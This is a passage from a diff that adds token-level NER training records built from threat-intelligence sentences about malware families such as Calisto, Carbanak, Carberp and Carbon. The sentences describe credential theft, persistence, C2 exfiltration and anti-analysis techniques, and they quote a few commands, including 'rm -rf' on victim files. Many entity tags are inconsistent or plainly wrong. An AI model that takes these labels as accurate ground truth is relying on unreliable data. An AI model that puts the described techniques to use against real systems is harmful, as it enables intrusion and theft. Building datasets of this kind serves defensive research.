"O", + "O" + ] + }, + { + "tokens": [ + "Cadelspy", + "has", + "the", + "ability", + "to", + "steal", + "information", + "about", + "printers", + "and", + "the", + "documents", + "sent", + "to", + "printers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cadelspy", + "has", + "the", + "ability", + "to", + "capture", + "screenshots", + "and", + "webcam", + "photos." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Cadelspy", + "has", + "the", + "ability", + "to", + "discover", + "information", + "about", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "adds", + "permissions", + "and", + "remote", + "logins", + "to", + "all", + "users." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "uses", + "the", + "<code>zip", + "-r</code>", + "command", + "to", + "compress", + "the", + "data", + "collected", + "on", + "the", + "local", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "collects", + "information", + "on", + "bookmarks", + "from", + "Google", + "Chrome." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "can", + "collect", + "data", + "from", + "user", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "has", + "the", + "capability", + "to", + "use", + "<code>rm", + "-rf</code>", + "to", + "remove", + "folders", + "and", + "files", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "presents", + "an", + "input", + "prompt", + "asking", + "for", + "the", + "user's", + "login", + "and", + "password." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "uses", + "a", + "hidden", + "directory", + "named", + ".calisto", + "to", + "store", + "data", + "from", + "the", + "victim’s", + "machine", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "has", + "the", + "capability", + "to", + "upload", + "and", + "download", + "files", + "to", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "collects", + "Keychain", + "storage", + "data", + "and", + "copies", + "those", + "passwords/tokens", + "to", + "a", + "file." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "adds", + "a", + ".plist", + "file", + "to", + "the", + "/Library/LaunchAgents", + "folder", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "uses", + "launchctl", + "to", + "enable", + "screen", + "sharing", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "has", + "the", + "capability", + "to", + "add", + "its", + "own", + "account", + "to", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "uses", + "a", + "hidden", + "directory", + "named", + ".calisto", + "to", + "store", + "data", + "from", + "the", + "victim’s", + "machine", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto's", + "installation", + "file", + "is", + "an", + "unsigned", + "DMG", + "image", + "under", + "the", + "guise", + "of", + "Intego’s", + "security", + "solution", + "for", + "mac." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Calisto", + "runs", + "the", + "<code>ifconfig</code>", + "command", + "to", + "obtain", + "the", + "IP", + "address", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CallMe", + "exfiltrates", + "data", + "to", + "its", + "C2", + "server", + "over", + "the", + "same", + "protocol", + "as", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CallMe", + "has", + "the", + "capability", + "to", + "download", + "a", + "file", + "to", + "the", + "victim", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CallMe", + "uses", + "AES", + "to", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "CallMe", + "has", + "the", + "capability", + "to", + "create", + "a", + "reverse", + "shell", + "on", + "victims." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cannon", + "exfiltrates", + "collected", + "data", + "over", + "email", + "via", + "SMTP/S", + "and", + "POP3/S", + "C2", + "channels." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cannon", + "can", + "obtain", + "victim", + "drive", + "information", + "as", + "well", + "as", + "a", + "list", + "of", + "folders", + "in", + "C:\\Program", + "Files." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cannon", + "can", + "download", + "a", + "payload", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cannon", + "uses", + "SMTP/S", + "and", + "POP3/S", + "for", + "C2", + "communications", + "by", + "sending", + "and", + "receiving", + "emails." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "Cannon", + "can", + "obtain", + "a", + "list", + "of", + "processes", + "running", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cannon", + "can", + "take", + "a", + "screenshot", + "of", + "the", + "desktop." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cannon", + "can", + "gather", + "system", + "information", + "from", + "the", + "victim’s", + "machine", + "such", + "as", + "the", + "OS", + "version,", + "machine", + "name,", + "and", + "drive", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cannon", + "can", + "gather", + "the", + "username", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Tool", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cannon", + "can", + "collect", + "the", + "current", + "time", + "zone", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cannon", + "adds", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\Windows", + "NT\\CurrentVersion\\Winlogon</code>", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "exfiltrates", + "data", + "in", + "compressed", + "chunks", + "if", + "a", + "message", + "is", + "larger", + "than", + "4096", + "bytes", + "." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "has", + "a", + "command", + "to", + "delete", + "files." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "logs", + "key", + "strokes", + "for", + "configured", + "processes", + "and", + "sends", + "them", + "back", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "can", + "create", + "a", + "Windows", + "account." + ], + "ner_tags": [ + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "searches", + "recursively", + "for", + "Outlook", + "personal", + "storage", + "tables", + "(PST)", + "files", + "within", + "user", + "directories", + "and", + "sends", + "them", + "back", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "obtains", + "Windows", + "logon", + "password", + "details." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "encrypts", + "strings", + "to", + "make", + "analysis", + "more", + "difficult." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "downloads", + "an", + "executable", + "and", + "injects", + "it", + "directly", + "into", + "a", + "new", + "process." + ], + "ner_tags": [ + "B-Features", + "B-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "lists", + "running", + "processes." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "checks", + "the", + "Registry", + "key", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet", + "Settings</code>", + "for", + "proxy", + "configurations", + "information." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "stores", + "a", + "configuration", + "files", + "in", + "the", + "startup", + "directory", + "to", + "automatically", + "execute", + "commands", + "in", + "order", + "to", + "persist", + "across", + "reboots." + ], + "ner_tags": [ + "B-Features", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "has", + "a", + "plugin", + "for", + "VNC", + "and", + "Ammyy", + "Admin", + "Tool." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "enables", + "concurrent", + "Remote", + "Desktop", + "Protocol", + "(RDP)", + "sessions." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "performs", + "desktop", + "video", + "recording", + "and", + "captures", + "screenshots", + "of", + "the", + "desktop", + "and", + "sends", + "it", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "encodes", + "the", + "message", + "body", + "of", + "HTTP", + "traffic", + "with", + "Base64." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "encrypts", + "the", + "message", + "body", + "of", + "HTTP", + "traffic", + "with", + "RC2", + "(in", + "CBC", + "mode).", + "Carbanak", + "also", + "uses", + "XOR", + "with", + "random", + "keys", + "for", + "its", + "communications." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "The", + "Carbanak", + "malware", + "communicates", + "to", + "its", + "command", + "server", + "using", + "HTTP", + "with", + "an", + "encrypted", + "payload." + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbanak", + "has", + "a", + "command", + "to", + "create", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "queued", + "an", + "APC", + "routine", + "to", + "explorer.exe", + "by", + "calling", + "ZwQueueApcThread." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "installed", + "a", + "bootkit", + "on", + "the", + "system", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "captured", + "credentials", + "when", + "a", + "user", + "performs", + "login", + "through", + "a", + "SSL", + "session." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "hooked", + "several", + "Windows", + "API", + "functions", + "to", + "steal", + "credentials." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Carberp's", + "passw.plug", + "plugin", + "can", + "gather", + "account", + "information", + "from", + "multiple", + "instant", + "messaging,", + "email,", + "and", + "social", + "media", + "services,", + "as", + "well", + "as", + "FTP,", + "VNC,", + "and", + "VPN", + "clients." + ], + "ner_tags": [ + "B-Way", + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Carberp's", + "passw.plug", + "plugin", + "can", + "gather", + "passwords", + "saved", + "in", + "Opera,", + "Internet", + "Explorer,", + "Safari,", + "Firefox,", + "and", + "Chrome." + ], + "ner_tags": [ + "B-Way", + "B-SamFile", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "B-Tool", + "I-Tool", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "attempted", + "to", + "disable", + "security", + "software", + "by", + "creating", + "a", + "suspended", + "process", + "for", + "the", + "security", + "software", + "and", + "injecting", + "code", + "to", + "delete", + "antivirus", + "core", + "files", + "when", + "the", + "process", + "is", + "resumed." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp's", + "bootkit", + "can", + "inject", + "a", + "malicious", + "DLL", + "into", + "the", + "address", + "space", + "of", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "used", + "XOR-based", + "encryption", + "to", + "mask", + "C2", + "server", + "locations", + "within", + "the", + "trojan." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "exfiltrated", + "data", + "via", + "HTTP", + "to", + "already", + "established", + "C2", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "exploited", + "multiple", + "Windows", + "vulnerabilities", + "(CVE-2010-2743,", + "CVE-2010-3338,", + "CVE-2010-4398,", + "CVE-2008-1084)", + "and", + "a", + ".NET", + "Runtime", + "Optimization", + "vulnerability", + "for", + "privilege", + "escalation." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "B-Features", + "B-Features", + "O", + "O", + "B-Way", + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "created", + "a", + "hidden", + "file", + "in", + "the", + "Startup", + "folder", + "of", + "the", + "current", + "user." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "can", + "download", + "and", + "execute", + "new", + "plugins", + "from", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "masqueraded", + "as", + "Windows", + "system", + "file", + "names,", + "as", + "well", + "as", + "\"chkntfs.exe\"", + "and", + "\"syscron.exe\"." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "used", + "the", + "NtQueryDirectoryFile", + "and", + "ZwQueryDirectoryFile", + "functions", + "to", + "hide", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "collected", + "a", + "list", + "of", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "searched", + "the", + "Image", + "File", + "Execution", + "Options", + "registry", + "key", + "for", + "\"Debugger\"", + "within", + "every", + "subkey." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "maintained", + "persistence", + "by", + "placing", + "itself", + "inside", + "the", + "current", + "user's", + "startup", + "folder." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "used", + "user", + "mode", + "rootkit", + "techniques", + "to", + "remain", + "hidden", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "can", + "capture", + "display", + "screenshots", + "with", + "the", + "screens_dll.dll", + "plugin." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "queried", + "the", + "infected", + "system's", + "registry", + "searching", + "for", + "specific", + "registry", + "keys", + "associated", + "with", + "antivirus", + "products." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "collected", + "the", + "operating", + "system", + "version", + "from", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "can", + "start", + "a", + "remote", + "VNC", + "session", + "by", + "downloading", + "a", + "new", + "plugin." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "removed", + "various", + "hooks", + "before", + "installing", + "the", + "trojan", + "or", + "bootkit", + "to", + "evade", + "sandbox", + "analysis", + "or", + "other", + "analysis", + "software." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carberp", + "has", + "connected", + "to", + "C2", + "servers", + "via", + "HTTP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Carbon", + "has", + "used", + "RSA", + "encryption", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "decrypts", + "task", + "and", + "configuration", + "files", + "for", + "execution." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "has", + "a", + "command", + "to", + "inject", + "code", + "into", + "a", + "process." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "uses", + "HTTP", + "to", + "send", + "data", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "creates", + "a", + "base", + "directory", + "that", + "contains", + "the", + "files", + "and", + "folders", + "that", + "are", + "collected." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "uses", + "TCP", + "and", + "UDP", + "for", + "C2." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "encrypts", + "configuration", + "files", + "and", + "tasks", + "for", + "the", + "malware", + "to", + "complete", + "using", + "CAST-128", + "algorithm." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "uses", + "the", + "<code>net", + "group</code>", + "command." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "can", + "list", + "the", + "processes", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "enumerates", + "values", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-SecTeam", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "uses", + "the", + "<code>net", + "view</code>", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "creates", + "several", + "tasks", + "for", + "later", + "execution", + "to", + "continue", + "persistence", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "can", + "collect", + "the", + "IP", + "address", + "of", + "the", + "victims", + "and", + "other", + "computers", + "on", + "the", + "network", + "using", + "the", + "commands:", + "<code>ipconfig", + "-all</code>", + "<code>nbtstat", + "-n</code>,", + "and", + "<code>nbtstat", + "-s</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Carbon", + "uses", + "the", + "<code>netstat", + "-r</code>", + "and", + "<code>netstat", + "-an</code>", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "uses", + "the", + "command", + "<code>net", + "time", + "\\\\127.0.0.1</code>", + "to", + "get", + "information", + "the", + "system’s", + "time." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "can", + "use", + "HTTP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "can", + "use", + "Pastebin", + "to", + "receive", + "C2", + "commands." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Carbon", + "establishes", + "persistence", + "by", + "creating", + "a", + "service", + "and", + "naming", + "it", + "based", + "off", + "the", + "operating", + "system", + "version", + "running", + "on", + "the", + "current", + "machine." + ], + "ner_tags": [ + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "applies", + "compression", + "to", + "C2", + "traffic", + "using", + "the", + "ZLIB", + "library." + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "and", + "its", + "watchdog", + "component", + "are", + "compiled", + "and", + "executed", + "after", + "being", + "delivered", + "to", + "victims", + "as", + "embedded,", + "uncompiled", + "source", + "code." + ], + "ner_tags": [ + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "decodes", + "many", + "of", + "its", + "artifacts", + "and", + "is", + "decrypted", + "(AES-128)", + "after", + "being", + "downloaded." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "encodes", + "many", + "of", + "its", + "artifacts", + "and", + "is", + "encrypted", + "(AES-128)", + "when", + "downloaded." + ], + "ner_tags": [ + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Cardinal", + "RAT", + "can", + "communicate", + "over", + "multiple", + "C2", + "host", + "and", + "port", + "combinations." + ], + "ner_tags": 